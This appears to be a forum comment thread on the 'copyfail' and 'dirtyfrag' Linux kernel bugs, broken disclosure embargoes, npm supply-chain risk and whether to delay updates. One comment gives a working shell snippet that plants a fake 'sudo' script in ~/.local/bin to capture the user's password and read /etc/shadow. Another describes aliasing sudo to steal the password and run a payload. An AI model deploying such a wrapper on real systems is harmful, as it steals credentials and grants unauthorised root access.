But it was too convenient. Anyone warning about it or trying to limit the damage was shouted down by people who had no experience of any other way of doing things. "import antigravity" is just too easy to do without.
Well, now we're reaching the "find out" part of the process I guess.
Assuming we survive the gap period where every country chucks what they still have at their worst enemies, I mean. I suppose we can always hit each other with animal bones.
I don't think it's reasonable to say that an OS that lacks it isn't "serious" about security.
For local attackers there may be easier avenues to leak the ASLR slide, but for remote attackers it's almost universally agreed it significantly raises the bar.
>I don't think it's reasonable to say that an OS that lacks it isn't "serious" about security.
When they implemented it in 2019 it had been an 18-year-old mitigation. If you are serious about security, you implement everything that raises the bar. The term "defense-in-depth" exists for a reason, and ASLR is probably one of the easiest and most effective defense-in-depth measures you can implement that doesn't necessarily require changes from existing code other than compiling with -pie.
FreeBSD isn’t secure, I suspect you’re sitting on a pile of 0 days for it?
With FreeBSD there's never any question of "who should this get reported to".
Not sure what you mean by this. Debian is able to handle coordinated disclosures (when they're actually coordinated), and get embargoed security updates out rapidly without breaking the embargo.
Is there some other aspect of this that you're referencing?
https://github.com/artifact-keeper
An artifact manager. Only get what you approve. So you can get fast updates when needed and consistently known stable when you need it. Does need a little config override - easy work.
I had my own janky tooling for something like it. This is a good project.
Once noticed, that's where the exploit explosion erupts, excited exploiters everywhere, emboldened... enticed... excessively encouraged, by your delayed updates.
Attackers can’t push a security update without going through the reporting process (e.g. Github CVE), so they can’t necessarily abuse that easily.
Another model is Perl's CPAN where you publish source files only.
(Naively, not knowing much about apt-get or yum or other OS package managers, I have always assumed that 1. only a handful of trusted people can publish to the default repos for system package managers and 2. that since I have to run `apt-get install` as root anyway, package installers can completely pwn my system if they want to and I am protected purely by trust. Is some of that wrong? If it's right, isn't it nonsensical to be any more worried about installing new packages in light of these vulns?)
We set up our base containers with all the external dependencies already in them and then only update those explicitly when we decide it's time.
This means we might be a bit behind the bleeding edge, but we're also taking on a lot less risk with random supply chain vulns getting instant global distribution.
What I want to say with that is fundamentally our world works because atleast most people do not abuse shit. That is fundamentally how human society has always worked, and will likely continue to do so.
echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.bashrc
mkdir -p .local/bin/
cat <<EOF >.local/bin/sudo
read -rs -p "[sudo] password for $USER: " PASSWORD
echo ""
echo "$PASSWORD" | /usr/bin/sudo -S head /etc/shadow
EOF
chmod +x .local/bin/sudo
attack on next sudo call, shows data accessible only to root.Our security model based on distributions verifying packages, that is distro maintainers. Software we can't trust should be running in VMs. Attack on trivy is just the beginning and solution is removing pip, uv, npm, rbenv from host, running in docker containers:
$ docker run -it -v.:/app -w /app node:alpine /bin/sh
long term environments defined in docker compose: $ docker-compose.yml
services:
app:
image: node:alpine
volumes:
- .:/app
working_dir: /app
command: /bin/sh
$ docker compose run app
switch to Kata etc if more protection needed. Eventually all userspace would run in VMs.Edit: I think I understand. copyfail is a kernel bug that lets a malicious npm package get root access on your Linux server, right?
So now, while there are unpatched servers, is when it would be the perfect time for attackers to target NPM packages.
And the advice isn't just "update your kernel" because we are still finding new related issues?
I've done that ever since. Of course, I still use packages like express and tailwindcss. But in the era of LLMs, using a package for something like react drop-downs is unnecessary.
the idea that it exists at all is more or less a gentleman's agreement in the engineering world anyway
> Because the responsible disclosure schedule and the embargo have been broken, no patch exists for any distribution.
I had to do a double take reading that. It’s written something happened and prevented them from following a schedule but seemingly they chose to release the information. I hope I’m missing something where it was forcibly disclosed elsewhere.
Edit: Moments later I refreshed the homepage and saw the announcement. They do claim to have consulted with maintainers
Very odd wording. I assume there’s an interesting/upsetting story here that will come out soon.
If you can't trust your update sources, you have bigger problems.
People lamented semver not being trustable but that ship sailed a long time ago, and supply chain attacks are going to get worse before they get better.
Our team is pretty minimal when it comes to enforced hooks (everyone has their own workflow) but no one could come up with an objection to this one.
It takes 45 seconds to go check how old the copyfail and dirtyfrag vulnerabilities actually are. Which is longer than it takes to read TFA. Dirtyfrag may be relevant to systems from as far as 2017.
It's not "new" software being affected. And actual old software is in a much worse state because we had a lot more time to find their problems.
I don't remember where I read it, but it basically boils down to need vs want.
I've used that rule for deciding between a new car or used. A fancy vacuum or basic.
A shiny new gadget.
Bringing new things into the tech stack.
Picking a new tech stack.
I am worried that the sluggishness appeared about the same time on both devices
I know there are extensions and proxies you can set up that do this, but it just seems like it should be built in to NPM directly (maybe it has, I haven't been up on Node programming in the last couple years).
Reducing attack surface and software complexity will (theoretically) reduce the number of possible exploits regardless of what new tool or process attackers discover.
AI coding is great at is helping you try out things you wouldn't have the time or energy to normally do. It shines for writing scripts that aren't part of a larger codebase, and helping with boring, rote tasks.
Hackers are also very motivated to use new tools to find any kind of opening (unlike normal devs who aren't always as... motivated :).
I'm not associated with the project in any way and am very much open to other suggestions, either as an alternative to LuLu or to complement it.
I switched to llama.cpp because of that.
To me it feels more and more that the slopcode world is the opposite philosophy of reproducible builds. It's like the anti methodology of how to work in that regard.
Before, everyone was publishing breaking changes in subminor packages because nobody adhered to any API versioning system standards. Now it's every commit that can break things. That is not an improvement.
When I see pages of obviously generated prose being submitted as any kind of documentation, my eyes just glaze over. I feel so guilty sharing similar stuff too, though to my credit, at least I always lead with a self-written TLDR, the slop is just for reference. But it's so bad, like genuinely distressing tier. I don't want to read all that junk, and more and more gets produced.
Prose type docs have always been my Achilles heel, and this is like the worst possible evolution of that.
For a brief period in the past few weeks, they somehow managed to make a change to ChatGPT Thinking that made it succint. The tone was super fact oriented too. It was honestly like waking up from a fever dream.
It means you skip supply chain attacks but may miss fresh vulnerability patches too.
We’re not downloading new firmware and installing for a lot of things it’s all getting pulled in automatically.
But problem is this could lead to abuse of the CVE system to try to force rapid adoption of attacked packages. What prevents this?
Behaviours matter more than OS security primitives.
Once everyone takes the stance of waiting 2 weeks, we are all back to the same situation.
I don’t like the suggestion to “wait for others to be the unfortunate victims, so that I can benefit from their misfortune”.
Surely there’s a better way.
there's a secure option provided by the web - no build - scripts at the top / bottom of the page
they're executed in a secure sandbox
6-19-2005
My copy of StepMania is turning old enough to drink in like a month and it's still fantastic, software updates are (mostly) a scam.
Just alias sudo to sudo-but-also-keep-password-and-execute-a-payload in ~/.bashrc and wait up to 24 hours. Maybe also simulate some breakage by intercepting other commands and force the user to run 'sudo systemctl' or something sooner rather than later.
this is only scary for rootless containers as it skips an isolation layer, but we've started shipping distroless containers which are not vulnerable to this due to the fact that they lack priviledge escalation commands such as su or sudo.
never trust software to begin with, sandbox everything you can and don't run it on your machine to begin with if possible.
But there are a lot of academic and research institutions that actually do have good Linux user management. I worked at a pediatric hospital, and the RHEL HPC admins did not mess around in terms of who was allowed to access which patients' data. As someone who was not an admin, it was a huge pain and it should have been. So this bug has pretty serious implications, seems like anyone at that hospital can abscond with a lot of deidentified data. [research HPC not as sensitive as the clinical stuff, which I think was all Windows Server]
I won't enter into all the details but... It's totally possible to not have the sudo command (or similar) on a system at all and to have su with the setuid bit off.
On my main desktop there's no sudo command there are zero binaries with the setuid bit set.
The only way to get root involves an "out-of-band" access, from another computer, that is not on the regular network [1].
This setup as worked for me since years. And years. And I very rarely need to be root on my desktop. When I do, I just use my out-of-band connection (from a tiny laptop whose only purpose is to perform root operations on my desktop).
For example today: I logged in as root blocked the three modules with the "dirty page" mitigation suggested by the person who reported the exploit.
You're not faking sudo with a mocking-bird on my machine. You're not using "su" from a regular user account. No userns either (no "insmod", no nothing).
Note that it's still possible to have several non-root users logged in as once: but from one user account, you cannot log in as another. You can however switch to TTY2, TTY3, etc. and log in as another user. And the whole XKCD about "get local account, get everything of importance", ain't valid either in my case.
I'm not saying it's perfect but it's not as simple as "get a local shell, wait until user enters 'sudo', get root". No sudo, no su.
It's brutally simple.
And, the best of all, it's a fully usable desktop: I'm using such a setup since years (I've also got servers, including at home, with Proxmox and VMs etc., but that's another topic).
Most people however aren't and will happily run sudo after an npm postinstall script tells them to apt-install turboencabulator for their new frontend framework to function.
What are people thinking with these meme style vulnerability names? It's going to be hard to pitch "we need to push back the timeline on this new infrastructure deploy while we mitigate Copy Fail 2: Electric Boogaloo".
Sure we've just faced an acceleration phase and a wave of patches will follow before settling in. But where we used to find x zero-day per million LoC, we will now find 10x ZD/MLoC. [hopefully detection will become part of CI so that number may vary]
So, we will have more disasters waiting to happen. Assume that they will happen.
My #1 recommendation is to curate a list of the auth tokens that you use (keep the list, not the actual tokens in a central place...), and be ready to rotate them as automatically as possible. You already have backups. Know how to rotate all your credentials.
Write some scripts. Get ready. It will happen.
They’re always racing to be the first one to write an article about a case.
This makes no sense.
So, copy.fail refers to a linux kernel problem, yes? A local instructor showed it to us, e. g. by using python to become superuser.
Well ... does this mean that a computer system is useless, because of that bug? No. Besides, people can patch it already, so while that is indeed a huge bug as such, it does not mean it makes people's computer useless at all.
But, even ignoring this ... why would we now AVOID installing new software" for a bit? What rationale is given here? The rationale was given "because of ... uhm ... npm supply chain attacks":
"Right now would be one of the best times for a supply chain attack via NPM to hit hard.
Outside of Linux kernel patches from your distro, I think it's probably a good idea to put a moratorium on installing new software for a week or so."
Well, many computer systems won't even have npm installed. Besides, if they do, they should be well aware of npm having had issues for such a long time. left-pad is still the funniest one of all tims IMO, or among top three. copy.fail is not funny - it is almost so simple that it is stupid, which kind of makes this an epic fail indeed, and that AI found it also kind of means that skynet won. Humans won't find as many weaknesses as AI skynet will. But just because of such an exploit and npm sucking, why would this mean I should ... arbitrarily stop compiling any new software? THAT MAKES ABSOLUTELY NO SENSE AT ALL. That "rationale" is not a rationale. That is just an opinion, without any real argument to be had.
If the issue is serious, patch the linux kernel. End of story. No need to have a "moratorium" on installing new software. The "for a bit" makes no sense anymore than "for 50 days" or any other arbitrary number. xeiaso is not THINKING here.
The copyFail didn't, the dirtyfrag doesn't.
This copfail2 does modify /etc/passwd, but I can't `su - sick` as expected.
/s
Code is cheap and is becoming cheaper by the day. We need new paradigms.
I know this is unrelated to the article, but related to the title.